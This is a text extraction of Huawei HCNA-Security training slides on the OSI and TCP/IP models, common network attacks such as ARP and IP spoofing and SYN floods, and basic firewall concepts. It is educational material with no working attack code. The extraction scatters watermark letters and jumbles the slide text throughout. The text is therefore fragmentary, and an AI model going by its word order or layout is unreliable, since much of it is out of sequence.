HCNA-Security-CBSN Constructing Basic Security Network Training

The privilege of HCNA/HCNP/HCIE:
m
o
c
With any Huawei Career Certification, you have the privilege on http://learning.huawei.com/en to enjoy:
ContentAll Huawei Career Certification E-Learning courses
Methods to get the E-learning privilege : submit Huawei Account and email being used for Huawei Account
h
.
g
n
i
Content: Huawei product training material and Huawei career certification
n training material
r
a Training/Classroom Training ,then you can
MethodLogon http://learning.huawei.com/en and enter HuaWei
e
lpage.
download training material in the specific training introduction
/
/
3 Priority to participate in Huawei Online Open Class(LVC)
:
p all ICT technical domains like R&S, UC&C, Security,
ContentThe Huawei career certification training covering
t
ht professional instructors
Storage and so on, which are conducted by Huawei
MethodThe plan and participate method :
please refer to
s
e
http://support.huawei.com/ecommunity/bbs/10154479.html
c
r
4Learning Tool: eNSP
u
o Platform) is a graphical network simulation tool which is developed by
s
eNSP (Enterprise Network Simulation
e
R
Huawei and free of charge. eNSP mainly simulates enterprise routers, switches as close to the real hardware as
g the lab practice available and easy without any real device.
it possible, which makes
n
i
In addition, Huaweinhas built up Huawei Technical Forum which allows candidates to discuss technical issues with
r
Huawei expertsa, share exam experiences with others or be acquainted with Huawei Products(
http://support.huawei.com/ecommunity/
Le
e TECHNOLOGIES CO., LTD.
HUAWEI
Pa g e 1
r
o
2 Training Material Download
w
a
u
.
i
e
1Comprehensive E-Learning Courses
registration to Learning@huawei.com .
n
e
/
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Chapter 1 Network in
n
r
Security Overview lea
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
w
a
u to:
Upon completion of this course, you will be h
able
.
g
n
Understand OSI model
i
n
r
a
Understand TCP/IP principles
e
l
/
/
:
Understand TCP/IP security issues
p
t
ht means
Understand Common attack
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 2
Copyrig
o
m
o
c
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. OSI Model Introduction
h
.
g
n
i
n
2. TCP/IP Introduction
r
a
le
3. TCP/IP Security Issues
/
/
p:
4. Common Network Attackstt
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 3
n
e
/
m
o
c
OSI Model Generation
.
i
e
w
a
u
h
.
g
Purposes
Design principles
Strengths
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 4
n
e
/
Introduction to Seven Layers of the OSIom

c
.
i
Model
e
w
a
u
h
Application layer
7 Providing inter-application
APDU
.
communication
g
n
Three
i
n data formats and
Presentation layer 6 Processing
PPDU
r
upper
a encryption
data
e
layers
l
/
SPDU
Session layer
/ 5 Setting up, maintaining, and managing
:
sessions
p
t
ht
Segment
Transport layer
4 Establishing E2E connections of hosts
:
s
e
c
Network
layer
r
3 Addressing and routing
Packet
Four
u
o
s
lower
e Data link layer 2 Providing medium access and link
R
Frame
layers
g
management
n
i
n
Physical layer
r Bit
1 Transmitting bit streams
a
Le
e
r
o
Pa ge 5
n
e
/
m
o
c
Communication Between Peer Layers
.
i
e
w
a
Each layer communicates with its peer layer by using the service
u
h
.
provided by the lower layer.
g
n
APDU
i
n layer
Application layer
Application
r
a
e
l
PPDU
/
Presentation layer
Presentation layer
/
:
SPDUtp
Session layer
Session layer
ht
Segment
:
s
e
Transport layer
Transport layer
c
r Packet
u
o
Network layer
Network layer
s
e
Host A
Host B
Frame
R
g link layer
Data
Data link layer
n
i
Bit
n
r
a Physical layer
Physical layer
e
L
r
Pa ge 6
Copyrig
o
n
e
/
Procedure for Processing Network Dataom

c
.
i
Streams
e
w
a
u
h
.
g
n
i
D
nC
r
a
e
l
/
A
/
:
p E
B tt
h
Router A
Router C
:Router B
s
e
Network c
r
layer u
o
s
Dataelink
R
layer
gPhysical
n
i layer
n
r
a
Le
e
r
o
Application
layer
Application
layer
Presentation
layer
Presentation
layer
Session
Session
layer
layer
Transport
layer
Transport
layer
Network
layer
Network
layer
Network
layer
Network
layer
Data link
layer
Data link
layer
Data link
layer
Data link
layer
Physical
layer
Physical
layer
Physical
layer
Physical
layer
Pa ge 8
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 9
n
e
/
m
o
Mapping Between TCP/IP and OSI Model Layers
c
.
i
e
w
a
TCP/IP is simply tiered and layers clearly map withu OSI model
h
.
g
layers.
n
OSI
i TCP/IP
n
r
a
e
Application layer
l
/
/
Application layer
:
Presentation layer
p
t
t
h
Session layer
:
s
e
Transport layer
Transport layer
c
r
u
o
Network layer
Network layer
s
Re
g
Data link layer
Data link layer
n
i
nlayer
r
Physical
a
e
L
r
Pa ge 10
Copyrig
o
n
e
/
Encapsulation and Decapsulation Processesom

c
.
of TCP/IP Packets
ei
n
i
n
r
a
le
/
/
p:
APP User data
Transport
layer
TCP APP
Network
layer
IP
Data link
layer
Eth
g
n
i
Decapsulation process
Application
layer
h
.
g
Encapsulation
process
User data
w
a
u
User data
t
t
h
:
s
e
c
TCP APP
r
u
o
s
RIPe TCP APP
Application
layer
Transport
layer
Network
layer
User data
Data link
layer
User data
n
10101011010101001010100011101010010101
r
a
e
r
o
User data
Le
Pa ge 11
n
e
/
m
o
Functions of Each TCP/IP Layer i.c
e
w
a
u
h
.
g
Application
n
Providing a network interface
HTTP, Telnet, FTP,TFTP, DNS
i
layer
n for applications
r
a
e
l
/
Transport
TCP/UDP
Establishing E2E connections
/
:
layer
p
t
t
ICMP,hIGMP
Network
IP
Addressing and routing
:
ARP,
RARP
s
layer
e
c
r PPP, HDLC, FR
u
Ethernet,
802.3,
o
Data link
s
Accessing physical media
e
layer
R
g
n
i
n
r
a
Le
r
Pa ge 13
Copyrig
o
n
e
/
m
o
c
Socket
.
i
e
w
a
u
FTP
HTTP
80
Telnet
20/21
23
25
DNS
53
TFTP
h SNMP
.
g
r
a
le
n
i
n
69
161
/
/
p: UDP
TCP
r
u
o
Socket
g
n
i
SMTP
t
t
hpackets
IP data
:
s
ce
s
e
R
Source socket: source IP address + protocol + source port
Destination socket: destination IP address + protocol + destination

port
e
r
o
n
r
a
Le
Pa ge 15
n
e
/
m
o
c
Data Link Layer Protocol
Source
n address
address
w
a
u
h
.
g
Ethernet protocol encapsulation
Destinatio
Type
n
i
n
r
a
le
Data
/
/
p:
:
s
e
c
r
t
t
h
46-1500 bytes
u
o
s
Types
Re
Type 0800: indicates IP.
Type 0806: indicates ARP.
Type 8035: indicates RARP.
e
r
o
.
i
e
n
r
a
g
n
i
Le
Pa ge 16
CRC
n
e
/
m
o
c
ARP
.
i
e
w
a
u
h
.
g
ARP encapsulation
n
i
n
r
a
le
Protocol address length
/
/
p:
Hardware address length
Destination
Source
Frame
Hardware
address
address
type
type
u
o
s
:
s
e
c
r
n
r
a
g
n
i
Re
Ethernet address
t
t
hProtocol
type
Address
IP address
OP
length
Destinatio
address
n address
28-byte ARP
request/response
IP type:
Le 0806
e
r
o
Source
Pa ge 17
n
e
/
m
o
c
Network Layer Protocol

Version
Packet
length
w
a
u
h
.
g
Total length
Service type
n
i
n
r
a
le
Flag
Identification
TTL
.
i
e
Protocol
:
s
e
c
r
/
/
p:
t
t
h
Fragment offset
Head checksum
Source IP address
u
o
sDestination IP address
rn
e
r
o
a
e
L
g
n
i
Re
IP option
Pa ge 19
n
e
/
m
o
c
Transport Layer Protocol

0
Source port
FIN
SYN
RST
PSH
ACK
URG
o
s
e
TCP checksum
rn
e
r
o
a
e
L
n
i
n
r
a
e
l
UDP packet format
/
/
:
p
Destination port
t
hSNt
:
Confirmation
No.
s
e
c
r
Window size
u
Data
h
.
g
UDP checksum (optional)
UDP length
Head length Reserved (6 bits)
24
Destination port
Source port
g
n
i
w
a
u
16
.
i
e
Urgent pointer
Option
Data
TCP packet format
Pa ge 21
31
TCP Connection Establishment
n
e
/
.
i
e
w
a
u
h
.
g
Three-way handshake
n
i
n
r
a
le
/
/
p:
Client
n
r
a
e
r
o
g
n
i
:
s
e
c
r
t
t
h
s
e
R
ou
Server
Le
Pa ge 22
m
o
c
n
e
/
m
o
c
TCP Connection Cutoff
.
i
e
w
a
u
h
.
g
Four-way handshake
n
i
n
r
a
le
/
/
p:
Proactively cut
off connections
n
r
a
e
r
o
g
n
i
:
s
e
c
r
t
t
h
u
o
s
Passively cut off

connections
Re
Le
Pa ge 23
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 24
n
e
/
m
o
c
TCP/IP Security Risks
.
i
e
w
a
u
IPv4
Lacking the data source verification mechanism
Lacking the integrity verification mechanism
Lacking the confidentiality guarantee mechanism
Common security risks
h
.
g
n
i
n
r
a
le
/
/
p:
t
t
h
:
s
e
c
rspoofing, packet fragmentation, ICMP attack, and
Network layer: IP address
u
o
s
route attack
Re
g SYN flood
Transport layer:
n
i
n
r layer: buffer overflow, vulnerabilities, viruses, and Trojan horses
Application
a
Le
r
Pa ge 25
Copyrig
o
Data link layer: MAC spoofing, MAC flood, ARP spoofing, STP redirection
n
e
/
m
o
c
ARP Security Risks
.
i
e
w
a
u
h
.
g
n
i
n
Gateway IP address: 192.168.0.1

MAC address: 01-11-21-31-41-51
r
a
le
I am the gateway.
/
/
p:
IP address: 192.168.0.10
MAC address: 00-01-02-03-04-05
:
s
e
c
r
t
t
h
IP address: 192.168.0.11
MAC address: 00-10-20-30-40-50
u
o
s
ARP spoofing
in
n
r
a
Re
ARP-reply to 192.168.0.1
ARP flood
Le
e
r
o
Pa ge 26
n
e
/
m
o
c
IP Security Risks
.
i
e
Sniffer
192.168.0.11
A:
192.168.0.11
w
a
u
h
.
g
B:192.168.0.12
n
i
n
r
a
le
Spoofed reply
/
/
p:
sniffed
:
s
e
c
r
t
t
h
request
Why IP address
is easily spoofed?
u
o
s
Re
Inter-node trust relationship: Build the trust relationship through IP addresses.
Man-in-the-middle attack: Forge legitimate IP addresses to obtain confidential
n
r
a
g
n
i
information.
e
r
o
Le
Pa ge 27
n
e
/
m
o
c
TCP Security Risks
.
i
e
w
a
u
h
.
g
Unauthorize
d connection
Host C that
initiates an
attack
SYN
SEQ
ACK
11001
n
i
n
ACK
SEQ
11001
:
s
e
c
r
r
a
le
/
/
p:
Spoofed packet from C to A
t
t
h
ACK
Host A
SYN
ACK
SEQ
ACK
54002
11001
54003
Spoofed packet from B to A
Deny service
from C to B
n
r
a
e
r
o
g
n
i
A trusts B
s
e
R
ou
Host B
Le
Pa ge 29
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 30
n
e
/
m
o
c
Passive Attack
.
i
e
w
a
u
Internet
h
.
g
e
r
o
Detection
Defense
n
r
a
g
n
i
r
a
le
/
/
:
p
Monitorin
t
t
g
h
:
s
e
c
r
Host A
n
i
n
u
o
s
Re
Host B
Why the IP
address is easily
spoofed?
Le
Pa ge 31
n
e
/
m
o
c
Active Attack
.
i
e
w
a
u
h
.
g
n
i
n
Internet
r
a
le
Business
resources of
an enterprise
Host A
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
g
n
i
Spoofing attack
rn
a
e
L
Spoofed part Data load
e
r
o
Re
Falsification attack
Packet head
DoS attack
Falsified part
Pa ge 32
n
e
/
m
o
c
Man-in-the-Middle Attack
.
i
e
w
a
u
h
.
g
n
i
n
Internet
:
s
e
c
r
t
t
h
Proactive attack
Passive attack
Falsify information
Host B
/
/
p:
Steal information
Host A
r
a
le
u
o
s
n
r
a
g
n
i
Re
Le
Attacker
e
Copyrig
or ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
Pa ge 33
n
e
/
m
o
c
Summary
.
i
e
w
a
u
h
.
g
OSI model
TCP/IP principles
TCP/IP security issues
Common attack means
n
i
n
:
s
e
c
r
r
a
le
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 34
n
e
/
m
o
c
Question
Why is ARP spoofing easily initiated?
How to realize IP spoofing?
.
i
e
w
a
u
n
i
n
h
.
g
r
a
e and UDP?
What is the difference between TCP
l
/
/
: but UDP does not have?
p
Why does TCP have head length,
t
t
h
: establishment require three-way
Why does TCP connection
s
e
c
handshake, but disconnection
require four-way
r
u
o
s
handshake? e
R
g
n
i
n
r
a
Le
r
Pa ge 35
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 36
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Chapter 2 Basic
n
i
n
r
a
Firewall Technology
e
l
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
m
o
c
w
a
u to:
able
.
g
Definition and classification of firewalls in
n
r
Main features and technologies oflfirewalls
ea
/
/
: firewall configurations
Data forwarding process and pbasic
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. Firewall Overview
h
.
g
n
i
n
2. Firewall Working Modes
r
a
le
3. Firewall Security Zones

4. Firewall Functions
/
/
p:
t
t
h
:
5. Basic Firewall Configuration
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 2
n
e
/
m
o
c
Firewall Overview
.
i
e
w
a
u
h
.
g
Firewall functions:
Filter for logical areas
Hides intranet structure
Self-security guarantee
Active attack defense
n
i
n
r
a
le
/
/
p:
t
t
h
: Firewall
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Intranet
Re
Router
Is it possible
to protect against the
flow that does not go through
the firewall?
Le
Pa ge 3
n
e
/
m
o
c
Firewall Classification
.
i
e
w
a
u
h
.
g
By form
Hardware firewall
Software firewall
n
i
n
r
a
le
By protected target
Standalone firewall
Network firewall
/
/
p:
By access control method s:
e
c
r
Packet filtering firewall
Proxy firewall
Stateful inspection firewall
n
r
a
e
r
o
g
n
i
t
t
h
u
o
s
Re
Le
Pa ge 4
n
e
/
m
Firewall Classification Packet
o
c
.
i
Filtering Firewall
e
w
a
u
1. Cannot correlate data packets
h
2. Cannot adapt to multi-channel
.
g
protocols
TCP layer
n
i
TCP layer
3. Do not check application-layer data
n
r
a
e
l
/
IP layer
/
IP layer
:
p
t
Detect headers
t
only h
:
Data link layer
s
Data link layer
e
c
rIP TCP APP
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 5
n
e
/
Firewall Classification Proxy om

c
.
i
Firewall
e
w
Extranet terminal
Proxy firewall
Send connection requests
Establish connection with the

client if the request goes
:
s
e
c
r
through the security check.
u
o
s
.
g
n
i
n
1. Slow processing
2. Difficult to upgrade
a
u
h
Intranet server
r
a
e
Security checklon the requests to
/ ones
/
block unqualified
:
p
t
t
Establish
h connection with the
server if going through the
check
Send packet A to the firewall.
rn
g
n
i
Re
Send response packet B to the
a
e
L
Send packet A to the server.

Send response packet B to the firewall.
terminal.
e
r
o
Pa ge 6
n
e
/
Firewall Classification Stateful om

c
.
i
Inspection Firewall
e
w
a
u
h
.Server 20.0.0.1
Host 10.0.0.1
g
n
i
n
r
a
e
l
/
/
TCP ACK
TCP ACK
:
10.0.0.1
10.0.0.1 20.0.0.1
10.0.0.1
TCP
ACK
SYN
20.0.0.1
20.0.0.1TCP
20.0.0.1 10.0.0.1 TCP SYN
TCP SYN
p
t
t
h
: policy check
Security
s
State error, drop
e
c
rRecord session information
u
o
1.Rapid processing
s
e
following packets R
2.High security g
n
i
n
r
a
e
L
e
r
o
Pa ge 7
n
e
/
Firewall Hardware
Platform Classification
m
o
c
.
i
e
w
a
u
h
.
g
Multi-core
NP
ASIC
Intel X86
Suitable for 100
M networks,
limited by CPU
processing ability
and PCI bus
speed
n
r
a
e
r
o
Hardware circuit,
which solidifies the
instruction or
calculation logic to
the hardware for
high processing
capacity and
firewall
performance
g
n
i
:
s
e
c
r
r
a
le
n
New-generation
i
n hardware platform.
/
/
p:
Specifically
designed for data
packets, a
compromise
between the X86
and ASIC
t
t
h
Multi-core solutions,
higher integration,
more efficient intercore communication
and management
mechanism
u
o
s
Re
Le
Pa ge 9
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le

/
/
p:
t
t
h
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 13
n
e
/
m
o
c
Firewall Working Modes
w
a
u
Routing mode: each interface has an

IP address;
Transparent mode: No interface has
any IP addresses;
Composite mode: some interfaces
have an IP address;
e
r
o
:
s
e
c
Do the interfaces
r
u
in transparent mode
o have
s
no IP address?
Re
g
n
i
n
r
a
Le
.
i
e
h
.
g
Routing
in mode
n
r
a
e
l
/
/
p:
t
t
h
Firewall
working
mode
Pa ge 14
n
e
/
m
o
c
Routing Mode
.
i
e
w
a
u
h
.
g
Features of routing mode
Supports more security features
Has some influence on network
n
i
n
Internet
r
a
le
/
/
p:
topology
t
t
h
192.168.10.1/30
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
192.168.10.5/30
Re
Untrust
192.168.10.129/30
Trust
192.168.10.133/30
Le
Pa ge 15
n
e
/
m
o
c
Transparent Mode
.
i
e
w
a
u
h
.
g
Features of transparent mode
n
i
n
Having no influence on network
r
a
le
topology
/
/
p:
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Internet
g
n
i
Re
t
t
h
192.168.10.1/30
Untrust
Trust
192.168.10.2/30
Le
Pa ge 16
n
e
/
m
o
c
Composite Mode
.
i
e
w
a
u
h
.
g
Features of composite mode
n
i
n
Transparent to network topology
r
a
le Internet
/
/
p:
s:
t
t
h
192.168.10.1/30
Whether single
firewall supports
composite mode
n
r
a
e
r
o
g
n
i
e
c
r
u
o
s
Re
Untrust
192.168.10.129/30
1.1.1.1/30
1.1.1.2/30
192.168.10.2/30
Le
192.168.10.130/30
Trust
Pa ge 17
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le

/
/
p:
t
t
h
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 18
n
e
/
m
o
c
Definition of Security Zones
w
a
u
Default security zone

ISP A
Untrust zone
Demilitarized zone (DMZ)
Trust zone
Where is the local zone?
rn
e
r
o
a
e
L
g
n
i
n
i
n
r
a
le Untrust
t
t
DMZ h
:
s
ce
Web server
r
u
o
h
.
g
ISP B
/
/
p:
Mail server
Local zone
.
i
e
Financial
server
ERP data
server
OA server
s
e
R
User terminal
Enterprise
Intranet
Pa ge 19
Trust
n
e
/
m
o
Definition of Inbound and Outbound
c
.
i
e
w
a
u
Definition of Inbound and Outbound
h
.
g
What is inbound?
n
i
n
What is outbound?
r
a
e
l
/
/
:
Untrust
p
t
t
zone
h
Internet
:
s
Trust zone
e
c
r
u
o
s
Re
g
n
Enterprise
i
n
Intranet
r
a
Le
r
Pa ge 20
Copyrig
o
Low security level
High security level
n
e
/
Relationship Between Firewall Security

m
o
c
.
Zones and Interfaces
ei
w
a
Relationship between firewall security zones and interfaces
u
h
Whether can the firewall have two security zones with the same
. security level?
g
nbelong to two different
Whether does the firewall allow one physical interface to
i
n
security zones?
r
a to a same security zone?
Whether can different interfaces of the firewall belong
e
l
/
/ Internet
:
p
t
ht
:
s
e
G0/0/3Untrust zone
G0/0/2DMZ
c
r
u
o
s
Re zone
G0/0/0Trust
G0/0/1Trust zone
g
n
i
n
r
a
Le
r
Pa ge 21
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le

/
/
p:
t
t
h
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 22
n
e
/
m
o
c
Firewall Functions
Switch
Routing
Static routing
Policy routing
RIPv2
OSPFv2
BGPv4
e
r
o
h
.
g
n Security
i
n
ACL
NAT
VPN:L2TP/GRE/IPSec/SS
L/ MPLS
P2P/IM
/
/
p:
SNMPv2v3
RMON
TR069
Telnet/SSL/HTTP(s)
FTP/TFTP
SYSLOG
Le
w
a
u
FE, GE
VLAN
Trunk,802.1ad
r
a
le
:
s
e
c
r
Unified
management
n
r
a
.
i
e
g
n
i
t
t
h
UTM
UTM
WiFi
802.11
bg
PPP
WLAN/WWAN PPPoE
ADSL2+
HDLC
3G
Re
u
o
s
AV
IPS
Anti-spam
URL filtering
Pa ge 23
n
e
/
Main Firewall Function Access om

c
.
i
Control
e
w
a
u
h
Identify header, offer

implementation measures
.
g
n
i
n
r
a
le
MAC
IP
TCP
t
t
h
Policy
Identity
g
n
i
Subject attributes
Subject operations
e
r
o
Le
Re
Server
Access control
u
o
s
Host A
n
r
a
Identity check
:
s
e
c
r
/
/
: load
pData
Pa ge 24
n
e
/
Basic Firewall Function Deep Packet om

c
.
Inspection
i
e
w
a
u
h
.
Identification based on:
g
n
i
n
r
Feature fields
a
e
l
/
Application-layer gateways
/
:
p
t
Behavior patterns
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 25
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 26
n
e
/
m
o
c
SACG Interworking Technology
.
i
e
w
a
u
Branches
Agent
Agent
r
a
le
/
/
p:
Agent
:
s
e
c
r
Agent
Agent: client agent
n
i
n
VPN access
Agent
h
.
g
u
o
s
t
SACG
t
h
Post-authentication
domain
UCL: account ACL
SM
SC
e
SRS
SPS
SACG: security access control
gateway
R
Anti-virus
Domain
server
(firewall)
g
managemen
n
t server
Patch
i
SM: management server
n
server
r
a
SC: control server
Pre-authentication domain
e
L
r
Pa ge 27
Copyrig
o
Security auditor
Security
administrator
n
e
/
High Availability 1 Dual-SystemomHot

c
.
USG
(host)
Backup
ei
w
a
u
h
.
g
n
i
n
PC
r
a
le
/
/
p:
Trust zone
Server
Intranet
10.110.1.0/24
:
s
e
c
r
t
t
h
PC
PC
Untrust zone
Extranet
Server
202. 10.0.0/24
u
USG (standby)
o
VRRP: provides redundant backup
s
e
R
VGMP: unifies the hostgand standby state of all interfaces on the device
n
i
HRP: indicates the
n session information between synchronized firewalls, for
r
aconfiguration information.
example,
e
L
r
Pa ge 28
Copyrig
o
n
e
/
m
o
High Availability 2 IP Link i.c
e
w
a
u
h
.
g
n
Carrier A
i
X
n
r
a
e
l
/
/
:
Carrier B
p
t
t
h
:
s
e
c
The results of IP link automatic
inspection
can be referenced by other functions,
r
u
o
and the main applicationssinclude:
Re
Applications in static
g routing
n
i
n
Applicationsar
in dual-system hot backup
Le
r
Pa ge 30
Copyrig
o
n
e
/
m
o
c
QoS
.
i
e
w
a
u
h
.
g
E2E Flow Control
n
i
n
r
a
le
Receiving
packets
t
t
h
Congestion
monitoring
Classificatio
n and
marking
:
s
e
c
r
/
/
p:
Congestion
management
u
o
s
n
r
a
g
n
i
Re
Provides service quality assurance

Improves customer satisfaction
Maximize resource utilization and improve service quality
e
r
o
Le
Pa ge 31
Bandwidth
guarantee
n
e
/
m
o
c
Log Auditing
.
i
e
w
a
u
h
.
g
n
i
n
Extranet
Collects all logs

passing through
the device
r
a
le Realizes high-speed
/
/
p:
t
t
h
log flow through

binary log format
:
s
e
c
r Intranet
u
o
s
ng
Re
Log server
Enterprise Intranet users
i
n
r
With eLog software, the firewall provides users with clear a record of network
access, and analysis for reference.
e
r
o
a
e
L
Pa ge 32
n
e
/
m
o
c
Firewall Features 1
Session List and ASPF
Security Zone
Session list:
Corresponding
Untrust
quintuple
data flow should
Server map list:
not be aged at a
triple
long time
Local
:Blacklist
s
e
c
r
Packet Statistics
Attack Defense
u
o
s
statistics analysis,
e
firewall R
realizes
g protection.
Intranet
n
ni
Attack defense can

detect various
types of network
attacks.
Through packet
Fragment Caching
n
i
n
Apply segment
caching to the
segment packet
that reaches
firewall earlier than
the first segment
packet.
r
a
le
/
/
p:
t
t
h
MAC and IP
Address Binding
e
r
o
IP packet filtering
Port Identification
User IP address
Avoid IP address
Allow users to
matching blacklist
fraud attack.
define a group of
will be shielded.
new port number in

addition to famous
ar
Le
w
a
u Packet Filtering
h
.
g
Long Connection
Trust
DMZ
.
i
e
port number.
Pa ge 33
n
e
/
m
o
c
Firewall Features 2
Access Control List
Network Address
Translation
Authentication and
Authorization
Layer- 2 Tunneling
Protocol
Adopt packet
Application basis
Slow down IP
RADIUS protocol
of packet filtering,
address space
HWTACACS
NAT, IPSec, QoS,
exhaustion
and policy-based
Hide Intranet
routing
private IP address.
ou
w
a
u
.h
g
n
ni
r
a
le
GRE VPN
Layer-3 tunneling
exchange network
protocol uses
technology for
tunnel technology.
information
/
/
p:
:
s
e
c
r
Load Balancing
IPSec VPN
.
i
e
exchange, which
extends the PPP
t
t
h
model.
IP-CAR
P2P Traffic Limiting
Logging
Privacy
Use the processing
IP connection limit
Limit P2P traffic to
Attack defense log
Integrity
capacity of all
IP bandwidth limit
ensure normal
Traffic monitoring
Authenticity
servers for load
operation of other
log
services.
Blacklist log
Replay attack
balancing.
defense
e
r
o
g
n
i
es
a
e
L
rn
Information
statistics
Pa ge 36
Firewall Performance Indicator

Throughput
n
e
/
.
i
e
m
o
c
w
a
u can
Throughput: the maximum traffic load that firewall
h
.
g
n
process at unit time
i
n
r
a
Effective throughput: the actual transmission
rate per second
e
l
/
/
excluding the data due to TCP packet
: drop and retransmission
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 40
Copyrig
o
n
e
/
Firewall Performance Indicator om

c
.
i
Latency
e
w
a
u
h
Definition: The time interval indicator, from the last bit of data packets going
.
g
n
i
n
in the firewall to the first bit going out of the firewall, is used to measure the
r
a
le
speed of firewall processing data.
time interval
the last bit of data
the first bit going out
packets going in
/
/
p:
:
s
e
c
r
Smartbits 6000B
rn
e
r
o
a
e
L
g
n
i
t
t
h
u
o
s Latency of packet arrival
Re
Packets can be forwarded

only after being detected
in the queue.
Pa ge 41
Firewall Performance Indicator New /en

m
o
c
Connections per Second
.
i
e
w
a
Definition: the number of new complete TCPhu
connections
.
g
established through firewall per second.in
n
r
a
e
l
/
/
:
preal-time data flow processing
This indicator is used to measure the
t
capacity of the firewall.
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 42
n
e
Firewall Performance Indicator
/
m
o
c
Concurrent Connections
.
i
e
w
a and the
Definition: A firewall processes packets based on connections,
u
hnumber of
.
number of concurrent connections refers to the maximum
g
n
itime. One connection is
connections that can be accommodated at the same
n
r
a
a TCP/UDP access attempt.
e
l
/
/
: number of connections
This indicator is used to measure the maximum
p
t and the server at the same time.
that can be established between the thost
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 43
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le

/
/
p:
t
t
h
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 44
n
e
/
m
o
c
VRP Platform
.
i
e
w
a
u
e
r
o
Re
Implements the
platform control
function, define plane
interface forwarding
specifications, and
realize the interaction
between the
forwarding plane and
the VRP control plane
of each product.
:
s
e
c
r
r
a
le Implements the
/
/
p:
u
o
s
n
r
a
n
i
n
Implements a unified
user's interface and
management interface
including real-time
operating system
kernel, IP software
forwarding engine,
route processing, and
configuration
management platform.
g
n
i
h
.
g
t
t
h
network interface
layer and shield
differences between
the link layer and
network layer of each
product.
Le
Pa ge 45
n
e
/
m
o
VRP Command Line Classificationi.c
e
w
It includes network diagnostic tool commands (ping and a
tracert),
u
h (Telnet client,
commands accessing external devices from the local device
.
Visit Level
g
SSH, and Rlogin). By using these commands, the configuration
files are not
n
i
allowed to be saved.
n
r
a
e
It is used for system maintenance andlservice failure diagnosis. It includes
/ using these commands, the
Monitoring
/
display and debugging commands.
By
:
Level
p
configuration files are not allowed
t to be saved.
t
h
:
It includes service configuration
commands. For example, commands of
s
e
Configuration
cnetwork layer, which provide direct network services
routing and each
r
Level
for users. ou
s
e
R
Itgis related to the system basic operation. It includes commands used by
n
Management
i
the system to support the module. These commands provide a support
n
Level
r
a for services.
e
L
r
Pa ge 47
Copyrig
o
n
e
/
m
o
c
VRP Command View
.
i
e
w
a
u
The system divides the command line interface into multiple command views.
h
.
g
All commands of the system are registered under certain command views.
n
i
n
The commands under this view can be run in the corresponding view.
r
a
le
Command view classification:
User view
<USG>
t
t
h
u
o
s
Re
[USG -Ethernet0/0/1 ]
g
n
i
Protocol view
[USG]
Interface view
:
s
e
c
r
System view
/
/
p:
n
r
a
[USG -rip]
e
r
o
Le
Pa ge 48
n
e
/
m
o
c
VRP Online Help
.
i
e
w
a
u
Type a command, followed by "?" separated by spaces. If the keyword is in
h
.
g
this location, all keywords and brief description are displayed.

<USG 5000> display ?
n
i
n
r
a
